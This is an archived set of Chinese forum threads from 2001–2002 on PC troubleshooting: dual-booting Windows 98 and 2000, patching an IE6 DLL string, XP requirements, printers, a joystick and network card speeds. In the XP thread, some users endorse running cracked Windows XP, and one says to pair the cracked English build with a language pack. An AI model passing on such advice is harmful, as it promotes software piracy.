帖子列表 - 经 典 论 坛

计算机技术
版主：51windows, ImHow, yunbin, 啸

经 典 论 坛
计算机技术

>> 分页 首页 前页 后页 转到 页 共301个记录

自你上次访问以来有新贴子在这个话题( [image] 超过 20 个回复)
自你上次访问以来没有新贴子在这个话题( [image] 超过 20 个回复)
已关闭的主题 - 不再接受回复.
置于顶部的贴子.

经典论坛计算机版块资料由海娃(51windows)整理


关于在win2000上安win98的问题

论坛信使： 推荐本页给您的朋友！

计算机技术
关于在win2000上安win98的问题

上一贴 | 下一贴
发表人 主题: 关于在win2000上安win98的问题
eden

高级用户
积分：151
发帖：41
来自：北京
注册：2002-01-26
 发表于 2002-03-02 15:16:03 按此观看eden的个人资料 按此发邮件给eden eden 的 oicq 是1292510,查看 1292510 的资料 收藏该主题供以后查看 发送悄悄话给eden 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看eden的IP
我已经安装了win2000，想在win2000上安win98，需要注意什么？98会不会覆盖2000的引导文件，记得2000有个多操作系统的启动菜单。

|　无　欲　则　刚　|
jill

终级用户
积分：575
发帖：175
来自：沈阳市
注册：2001-12-10
 发表于 2002-03-02 16:48:53 按此观看jill的个人资料 按此发邮件给jill jill 的 oicq 是33475686,查看 33475686 的资料 发送悄悄话给jill 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jill的IP
好像从98上装2000

誓与WIN2000共存
ImHow

怎样
积分：2137
发帖：566
来自：::HowHome::
注册：2002-01-16
 发表于 2002-03-02 16:49:30 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
装完后再装一便2000就OK了

欲说还休
欲说还休
却道天凉好个秋

唯有不断学习 才能不断进步

mao

现任版主
积分：1571
发帖：656
来自：北京
注册：2000-07-23
 发表于 2002-03-02 17:03:35 按此观看mao的个人资料 按此发邮件给mao 访问mao的主页 mao 的 oicq 是20801171,查看 20801171 的资料 发送悄悄话给mao 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看mao的IP
我没具体试过
但是觉得装完98后用2000的紧急修复盘修复一下就行了。

解决问题才有进步
解决问题才有进步
eden

高级用户
积分：151
发帖：41
来自：北京
注册：2002-01-26
 发表于 2002-03-02 20:25:16 按此观看eden的个人资料 按此发邮件给eden eden 的 oicq 是1292510,查看 1292510 的资料 发送悄悄话给eden 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看eden的IP
我已经装了win2000，难道装完98后，再装一遍2000？

|　无　欲　则　刚　|
ImHow

怎样
积分：2137
发帖：566
来自：::HowHome::
注册：2002-01-16
 发表于 2002-03-03 11:09:34 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
这是最简单的方法啊，用2000的盘修复就是麻烦一些
一般装多系统（MS）的顺序是从低级到高级

欲说还休
欲说还休
却道天凉好个秋

唯有不断学习 才能不断进步

啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-03-03 11:42:36 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP

引用:

可先把原“c:\boot.ini”文件备份下来，98重传系统（或重新安装）完成后，在98中运行2K的安装程序，当出现提示后选不重新启动，再进入“c:\”，把备份下来的“c:\boot.ini”文件覆盖回去，最后删除根目录下所有带＄符号的东东（一般有一个目录和两个文件，都是安装2K时产生的临时文件）重新启动即可！

    如果不小心选了重新启动，则在多重启动菜单中进入98后，再做恢复“c:\boot.ini”文件等操作。

    如果没有备份原“c:\boot.ini”文件，则需手动进行修改。在98中打开“c:\boot.ini”文件，将2K的安装一项（就是有“install/upgrade”的选项）删掉，再删除根目录下所有带＄符号的东东（一般有一个目录和两个文件，都是安装2K时产生的临时文件）后，重新启动就OK了！

    如果进不了2K，不要忘了按F8，用“上次成功启动的配置”进入哦！

http://www.ejiajia.com/it/software/windows/2001219/58558.htm

其实许多东西网上都有现成的，养成搜索的好习惯可以节省很多时间。

Blueidea Web Team.
Moderator Of Computer Technology Forum
啸

无意
现任版主
积分：5736
发帖：1962
来自：
注册：2000-08-01
 发表于 2002-03-04 08:19:10 按此观看啸的个人资料 按此发邮件给啸 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
经过实践，这个办法也适用于在XP上安装2000。
我昨天装了个win2000 sever版，原来的XP就不能进了，用XP的安装盘再进行安装到第一次重起，退出安装，这时XP和2000都能进了。
看来安装盘的用处真的很大。

Blueidea Web Team.
Moderator Of Computer Technology Forum
凌志

终级用户
积分：532
发帖：163
来自：鞍山
注册：2001-01-09
 发表于 2002-03-04 23:40:35 按此观看凌志的个人资料 按此发邮件给凌志 访问凌志的主页 凌志 的 oicq 是5685200,查看 5685200 的资料 发送悄悄话给凌志 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看凌志的IP
2000上安装98，直接用98光盘引导安装就行了，自动出现双启动菜单。

网络天下
四海一家
piety

终级用户
积分：737
发帖：210
来自：www.piccool.
注册：2001-09-03
 发表于 2002-03-05 09:38:39 按此观看piety的个人资料 按此发邮件给piety 访问piety的主页 piety 的 oicq 是21512363,查看 21512363 的资料 发送悄悄话给piety 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看piety的IP
有可能先装2000后装98自动出双启吗？我是没有试过

人生五十载，去事恍如梦幻。 天下之内，岂有长生不灭者！
上一贴 | 下一贴
快速回复 | 主题：关于在win2000上安win98的问题
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

本站网络平台由重庆网通信息港宽带网络有限公司提供


ie6的BUG

计算机技术
ie6的BUG

上一贴 | 下一贴
发表人 | 主题: ie6的BUG
nicely 初级用户 积分：40 发帖：19 来自： 注册：2001-07-29 | 发表于 2001-12-12 19:10:44 按此观看nicely的个人资料 按此发邮件给nicely nicely 的 oicq 是7955851,查看 7955851 的资料 收藏该主题供以后查看 发送悄悄话给nicely 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看nicely的IP 在地址栏。输入网址。例。163。后直接按CTRL+ENTER后，显示错误。http://www.163.co.cn/ 有无补丁下载。谢。 by nicely
yuzhiqing 终级用户 积分：682 发帖：417 来自：中国湖北 注册：2001-04-01 | 发表于 2001-12-12 23:03:35 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP IE6.0中文正式版有一个小小的bug。虽然这个bug不会影响正常使用，但是却会影响使用的方便性。bug体现在当你想使用自动添加“www.”和“.com”功能的时候。系统添加的不是“www.”和“.com”而是“www.”和“.co.cn”，那么如何修复这个bug呢？方法很简单。只需要用一个著名的软件来修改一个DLL文件就可以了。 首先复制C:\windows\system\browselc.dll文件到一个文件夹里面，然后用eXeScope打开这个文件，找到“资源”－“字串表”下的809字，打开找到12936，把“12936,http://www.%s.co.cn”改为“12936,http://www.%s.com”即可。因为windows在运行时要使用这个文件。所以直接修改而要复制出来再修改。最后在纯DOS下把修改好的browselc.dll文件覆盖原来的文件就可以了。如果是Win2000，那么文件的路径应该是C:\Winnt\system32\browselc.dll，其余方法一样。只不过在覆盖的时候最好进入DOS，如果是NTFS文件系统。就要进入安全模式里面，否则不能覆盖。切记切记！ WINDFLASH ::浅紫色FORUM::
上一贴 | 下一贴
快速回复 | 主题：ie6的BUG
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


决定装XP，请大家帮忙解答几个问题，急！

计算机技术
决定装XP，请大家帮忙解答几个问题，急！

上一贴 | 下一贴
发表人 主题: 决定装XP，请大家帮忙解答几个问题，急！
moonbaby526

初级用户
积分：94
发帖：93
来自：上海
注册：2001-06-24
 发表于 2001-11-12 20:00:53 按此观看moonbaby526的个人资料 按此发邮件给moonbaby526 访问moonbaby526的主页 moonbaby526 的 oicq 是14023400,查看 14023400 的资料 收藏该主题供以后查看 发送悄悄话给moonbaby526 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看moonbaby526的IP
1.听说XP速度很快，我的机器是赛扬II566，256兆内存，XP装上后我的爱机会跟的上吗？
2.装了XP后，可以装office2000吗？
3.office XP有吗？
以上问题请哪位尽快解答一下，谢谢！

可以不在乎，才能对别人在乎。
DayinNightout

超级用户
积分：338
发帖：150
来自：CCF
注册：2000-12-18
 发表于 2001-11-13 14:54:02 按此观看DayinNightout的个人资料 按此发邮件给DayinNightout 发送悄悄话给DayinNightout 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DayinNightout的IP
启动很快

能

有

木有签名#@$%
NTL1

初级用户
积分：16
发帖：8
来自：51DIGI
注册：2001-08-12
 发表于 2001-11-13 15:57:06 按此观看NTL1的个人资料 按此发邮件给NTL1 NTL1 的 oicq 是18748038,查看 18748038 的资料 发送悄悄话给NTL1 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看NTL1的IP
用IE6你就觉得不爽了,建议使用传统界面,不然窗口切换不爽.
Fly

Developer
积分：3998
发帖：995
来自：
注册：2001-10-31
 发表于 2001-11-13 20:23:26 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP
俺建议你超超，不要说你的566就是超上来的 [image] ，还有就是关闭一切你能关闭的特效，什么时候咱们也用上了P4 2。0的时候再开也不迟呀，

我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西.
----尼采

moonbaby526

初级用户
积分：94
发帖：93
来自：上海
注册：2001-06-24
 发表于 2001-11-13 20:37:38 按此观看moonbaby526的个人资料 按此发邮件给moonbaby526 访问moonbaby526的主页 moonbaby526 的 oicq 是14023400,查看 14023400 的资料 发送悄悄话给moonbaby526 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看moonbaby526的IP
Fly在上个帖子中说
引用:
俺建议你超超，不要说你的566就是超上来的 [image] ，还有就是关闭一切你能关闭的特效，什么时候咱们也用上了P4 2。0的时候再开也不迟呀，

超频？我没那么大胆子。但是请问何为特效？请举例说明。以便我装好后直接关闭。谢谢！

可以不在乎，才能对别人在乎。
Fly

Developer
积分：3998
发帖：995
来自：
注册：2001-10-31
 发表于 2001-11-13 20:43:43 按此观看Fly的个人资料 按此发邮件给Fly Fly 的 oicq 是7969660,查看 7969660 的资料 发送悄悄话给Fly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看Fly的IP
比如鼠标阴影，还有菜单的阴影等，在DESKTOP上右击，把桌面主题改为经典（windows classic)，背景不要，SCREEN SAVER用BLANK，不过主要的都在APPEARANCE中，我用的E文的，如果用中文，很容易改的

我的虚荣心是用十句话说出别人用一本书讲出的东西和别人用一本书没有讲出的东西.
----尼采

高级用户

初级用户
积分：0
发帖：2
来自：陕西
注册：2001-09-20
 发表于 2001-11-13 21:26:29 按此观看高级用户的个人资料 按此发邮件给高级用户 高级用户 的 oicq 是773377,查看 773377 的资料 发送悄悄话给高级用户 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看高级用户的IP
能用能用！俺是366加194，和你差不多，老牛拉破车。最好别安了。你用正版的话一年只能重装4次，盗版的话我还没听说有破解版的，再说了，我用的头昏！花里胡哨的……%
jeepstar

终级用户
积分：641
发帖：313
来自：温州@苏州
注册：2000-11-14
 发表于 2001-11-13 21:31:49 按此观看jeepstar的个人资料 按此发邮件给jeepstar jeepstar 的 oicq 是32230978,查看 32230978 的资料 发送悄悄话给jeepstar 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jeepstar的IP
我用的是赛扬II566 128MB内存 感觉速度不慢。你还是装吧！！
moonbaby526

初级用户
积分：94
发帖：93
来自：上海
注册：2001-06-24
 发表于 2001-11-14 20:42:29 按此观看moonbaby526的个人资料 按此发邮件给moonbaby526 访问moonbaby526的主页 moonbaby526 的 oicq 是14023400,查看 14023400 的资料 发送悄悄话给moonbaby526 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看moonbaby526的IP
没有破解版？为什么我们学校早就装上了中文版？
还有，听说XP很费空间，那至少要多大的c盘呢？我的c盘只有2.78G（总20G），如果不够的话，是不是要重新调整各逻辑盘的大小呢？

可以不在乎，才能对别人在乎。
EastSoul

初级用户
积分：82
发帖：35
来自：
注册：2001-07-14
 发表于 2001-11-15 16:02:58 按此观看EastSoul的个人资料 按此发邮件给EastSoul 访问EastSoul的主页 EastSoul 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给EastSoul 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看EastSoul的IP
正式破解的只有英文版，再打上中文语言包就可以了。

如此悲伤,如此
无奈地闭上了双眼
因为如此的荒芜
无论在怎样的空间
都是心灵巨大的不堪
不明白生命的绝境已然降临
死亡,在地平线上
闪烁魅人的光芒

[fly]==eAST sOUL==[/fly]

darkvn

小混蛋
现任版主
积分：8225
发帖：2542
来自：不是外星
注册：2001-03-02
 发表于 2001-11-15 17:19:03 按此观看darkvn的个人资料 按此发邮件给darkvn 访问darkvn的主页 darkvn 的 oicq 是2353523,查看 2353523 的资料 发送悄悄话给darkvn 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看darkvn的IP
我在用的就是中文解破版。还带plus的。两cd呵呵。

Blueidea Web Team
Moderator Of Dreamweaver & Javascript
randomix

小 乱
积分：4642
发帖：1647
来自：亂度謎城
注册：2000-11-30
 发表于 2001-11-15 18:16:09 按此观看randomix的个人资料 按此发邮件给randomix 访问randomix的主页 randomix 的 oicq 是3016887,查看 3016887 的资料 发送悄悄话给randomix 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看randomix的IP
XP大需要1.2G硬盘空间。

运行起来还行吧。我一直用，特效除了WINDOWS STYLE之外其他都关掉了，我喜欢那种蓝色的LUNA界面。。。。其他的就没什么必要。

建议下载POWER TOYS FOR XP，微软主页有，自定义很多东西，好用。

always ran...
上一贴 | 下一贴
快速回复 | 主题：决定装XP，请大家帮忙解答几个问题，急！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


打印机！

计算机技术
打印机！

上一贴 | 下一贴
发表人 主题: 打印机！
澄舞

初级用户
积分：36
发帖：65
来自：
注册：2001-08-20
 发表于 2001-12-03 10:38:03 按此观看澄舞的个人资料 按此发邮件给澄舞 收藏该主题供以后查看 发送悄悄话给澄舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看澄舞的IP
各位，我又有事拜托了！我的打印机是canon bjc-3000,不知道是硬件还是软件的问题，我打印出来的东西都非常模糊，颗粒很大，真的很差劲耶！驱动也只有英文版的！我甚至找不到设置分辨率的地方！各位，有没有人可以帮我的呢？ ;)
yuzhiqing

终级用户
积分：682
发帖：417
来自：中国湖北
注册：2001-04-01
 发表于 2001-12-03 22:58:49 按此观看yuzhiqing的个人资料 按此发邮件给yuzhiqing 访问yuzhiqing的主页 yuzhiqing 的 oicq 是51998,查看 51998 的资料 发送悄悄话给yuzhiqing 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yuzhiqing的IP
是针式的吗？那应该是硬件问题，好象是打印头该换了~

WINDFLASH
::浅紫色FORUM::
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-12-03 23:27:59 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
澄舞在上个帖子中说
引用:
各位，我又有事拜托了！我的打印机是canon bjc-3000,不知道是硬件还是软件的问题，我打印出来的东西都非常模糊，颗粒很大，真的很差劲耶！驱动也只有英文版的！我甚至找不到设置分辨率的地方！各位，有没有人可以帮我的呢？ ;)

http://www.mydrivers.com
载个最新的驱动~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

澄舞

初级用户
积分：36
发帖：65
来自：
注册：2001-08-20
 发表于 2001-12-04 08:43:21 按此观看澄舞的个人资料 按此发邮件给澄舞 发送悄悄话给澄舞 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看澄舞的IP
谢谢各位的帮忙，我会好好“修理”它的。呵呵
上一贴 | 下一贴
快速回复 | 主题：打印机！
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


急死我了

计算机技术
急死我了

上一贴 | 下一贴
发表人 主题: 急死我了
cloud520

初级用户
积分：132
发帖：99
来自：中国
注册：2001-10-04
 发表于 2001-11-23 14:31:31 按此观看cloud520的个人资料 按此发邮件给cloud520 cloud520 的 oicq 是87215139,查看 87215139 的资料 收藏该主题供以后查看 发送悄悄话给cloud520 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cloud520的IP
我最近安装了个游戏杆，有方向的，有脚刹，手刹，星辰牌的，驱动可以装上，可是机器从来没有检测到新硬件，进了游戏，设置好一切，就是没有反映？￥·￥！%￥%%%￥……%—…………—……*——*—*

请指点迷津

鱼对水说：你看不到我的眼泪，因为我在水里。 水对鱼说：我可以感觉到你，因为你在我心里！
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-23 14:33:04 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
说明上说它支持即插即用了吗?

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

cloud520

初级用户
积分：132
发帖：99
来自：中国
注册：2001-10-04
 发表于 2001-11-23 14:43:29 按此观看cloud520的个人资料 按此发邮件给cloud520 cloud520 的 oicq 是87215139,查看 87215139 的资料 发送悄悄话给cloud520 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cloud520的IP
没有说明书，有两个口，一个打印机的口，还有个和显卡一样的插口，是两个都要用呢？还是一个就可以？

鱼对水说：你看不到我的眼泪，因为我在水里。 水对鱼说：我可以感觉到你，因为你在我心里！
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-23 14:47:10 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
cloud520在上个帖子中说
引用:
没有说明书，有两个口，一个打印机的口，还有个和显卡一样的插口，是两个都要用呢？还是一个就可以？

买来的时候提供几条连接线?

下次提问题是最好详细点~ 因为硬件问题涉及到很多方面的原因 单单凭一点不一定能判断出是什么问题~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

cloud520

初级用户
积分：132
发帖：99
来自：中国
注册：2001-10-04
 发表于 2001-11-23 14:55:31 按此观看cloud520的个人资料 按此发邮件给cloud520 cloud520 的 oicq 是87215139,查看 87215139 的资料 发送悄悄话给cloud520 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cloud520的IP
有两条线，都在上面 就是没有任何反映

鱼对水说：你看不到我的眼泪，因为我在水里。 水对鱼说：我可以感觉到你，因为你在我心里！
yunbin

经典强盗
现任版主
积分：2292
发帖：1001
来自：火星
注册：2001-09-27
 发表于 2001-11-23 15:14:05 按此观看yunbin的个人资料 按此发邮件给yunbin 访问yunbin的主页 yunbin 的 oicq 是2369009,查看 2369009 的资料 发送悄悄话给yunbin 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看yunbin的IP
cloud520在上个帖子中说
引用:
有两条线，都在上面 就是没有任何反映

一般现在的外设都是即插即用的 也就是接上后windows能有反应的 如果不是即插即用的话通过安装他的软件后也能让系统认出它
你的游戏杆连个说明都没有?看看它附带盘上有没有说明之类的, 不是正规的东西质量上可能会有很多问题 再不然你只能换台电脑试试或换个同样的游戏杆试试~

A man can succeed at almost anything
for which he has unlimited enthusiasm.

Blueidea Web Team
Moderator Of Computer Technology Forum

cloud520

初级用户
积分：132
发帖：99
来自：中国
注册：2001-10-04
 发表于 2001-11-23 15:16:16 按此观看cloud520的个人资料 按此发邮件给cloud520 cloud520 的 oicq 是87215139,查看 87215139 的资料 发送悄悄话给cloud520 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cloud520的IP
有个安装软盘 可是按照说明也没有反映 谢谢你

鱼对水说：你看不到我的眼泪，因为我在水里。 水对鱼说：我可以感觉到你，因为你在我心里！
chew000

初级用户
积分：4
发帖：12
来自：中华人民共和国重庆市
注册：2000-09-20
 发表于 2001-11-26 00:14:49 chew000 的 oicq 是3443839,查看 3443839 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
这个游戏是否支持手柄或摇杆？
在游戏中是否设定为用摇杆控制？
在控制面板中的游戏手柄内对摇杆调试时是否有反应？ ;)
那两条线一条是串口的一条是打印机口的。一般用串口那个。。用打印机口的也行。如果没找到新硬件。有可能是没插好。也有可能是摇杆有问题。
到商家那里试试！！ ;)

[这消息被chew000编辑过(编辑时间2001-11-26 00:16:30)]

If me got an idea.....
上一贴 | 下一贴
快速回复 | 主题：急死我了
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


100M 和 10M 网卡的问题

计算机技术
100M 和 10M 网卡的问题

上一贴 | 下一贴
发表人 主题: 100M 和 10M 网卡的问题
iris

终级用户
积分：1088
发帖：358
来自：Beijing
注册：2000-10-31
 发表于 2001-11-18 20:35:08 按此观看iris的个人资料 按此发邮件给iris iris 的 oicq 是15602095,查看 15602095 的资料 收藏该主题供以后查看 发送悄悄话给iris 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看iris的IP
我最近把本公司的计算机联网，一台装W2000Server，其余装W2000PROFESSIONAL，100M/10M 自适应HUB，发现装100M网卡的计算机互通，10M网卡的计算机也通，但装100M 和 10M 网卡的计算机之间不通，Ping不到，求教

  Iris is Iris
hellslayer

初级用户
积分：20
发帖：251
来自：不能上网的学校
注册：2001-04-04
 发表于 2001-11-19 20:19:59 按此观看hellslayer的个人资料 按此发邮件给hellslayer hellslayer 的 oicq 是4369873,查看 4369873 的资料 发送悄悄话给hellslayer 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看hellslayer的IP
hub上面应该有提示100M的口，看看会不会是口没接好.

如果不是的话,我给你提一下,看看其他斑竹能不能解决~

"我亦终将屈服于死亡，但在那之前，让我赢得荣耀吧"
iris

终级用户
积分：1088
发帖：358
来自：Beijing
注册：2000-10-31
 发表于 2001-11-19 21:33:36 按此观看iris的个人资料 按此发邮件给iris iris 的 oicq 是15602095,查看 15602095 的资料 发送悄悄话给iris 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看iris的IP
口是一样的且连接正常，有人建议我在每台机器上装上所有通信协议试试，但还是不行，我只有换网卡了？幸好现在网卡很便宜

  Iris is Iris
icefly

初级用户
积分：85
发帖：37
来自：
注册：2001-08-14
 发表于 2001-11-19 21:38:21 按此观看icefly的个人资料 按此发邮件给icefly icefly 的 oicq 是16640259,查看 16640259 的资料 发送悄悄话给icefly 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看icefly的IP
估计是网卡的设置有问题，在网卡的属性里面有高级的设计选项，那个link speed/duplex mode 设置中选上auto mode 选项，如果还是不行的话，（有些网卡是不能自适应的）可以把所有的网卡的速度改成统一的，比如全部设置成10m的。另外，有些网卡是半双工的，不能在full mode 下工作，设成half mode 就行了。看看网卡的说明。估计问题可以解决。

：：远看一只花
：：近看还是花
：：再近一点还是花
：：×￥◎！￥％……％有完没完？我当然是花
iris

终级用户
积分：1088
发帖：358
来自：Beijing
注册：2000-10-31
 发表于 2001-11-19 21:50:12 按此观看iris的个人资料 按此发邮件给iris iris 的 oicq 是15602095,查看 15602095 的资料 发送悄悄话给iris 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看iris的IP
thanks, icefly
我明天试试

  Iris is Iris
软硬兼施

终级用户
积分：465
发帖：295
来自：net
注册：2001-08-03
 发表于 2001-11-19 23:05:40 按此观看软硬兼施的个人资料 按此发邮件给软硬兼施 软硬兼施 的 oicq 是18245854,查看 18245854 的资料 发送悄悄话给软硬兼施 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看软硬兼施的IP
hellslayer在上个帖子中说
引用:
hub上面应该有提示100M的口，看看会不会是口没接好.

如果不是的话,我给你提一下,看看其他斑竹能不能解决~

问你一下啊你多大拉？？？？？？mcss和ccss的是学些什么啊？？？？

你英语几级啊？？？？？？？？？？？？？？？？？怎么学的啊？？

^^
iris

终级用户
积分：1088
发帖：358
来自：Beijing
注册：2000-10-31
 发表于 2001-11-22 21:28:23 按此观看iris的个人资料 按此发邮件给iris iris 的 oicq 是15602095,查看 15602095 的资料 发送悄悄话给iris 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看iris的IP
icefly 说得对，问题已解决
可惜我的100M网只能在10M半双工状态下工作

感谢回复的各位

  Iris is Iris
arrive

终级用户
积分：1231
发帖：410
来自：大连
注册：2000-12-02
 发表于 2001-11-23 11:38:47 按此观看arrive的个人资料 按此发邮件给arrive 访问arrive的主页 arrive 的 oicq 是7902765,查看 7902765 的资料 发送悄悄话给arrive 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看arrive的IP
网线的水晶头有两种接法的!

[这消息被arrive编辑过(编辑时间2001-11-23 11:38:50)]

Нельзя выпустить из руквозможностъ,которая случается в жизнь.
maobi

初级用户
积分：117
发帖：30
来自：浙江江山
注册：2000-12-04
 发表于 2002-04-19 15:54:20 按此观看maobi的个人资料 按此发邮件给maobi 发送悄悄话给maobi 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看maobi的IP
arrive在上个帖子中说
引用:
网线的水晶头有两种接法的!

着么看都像个白痴。

:::::我静静的看着这个世界:::::
上一贴 | 下一贴
快速回复 | 主题：100M 和 10M 网卡的问题
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


手提计算机和PC怎么样互联？急！

计算机技术
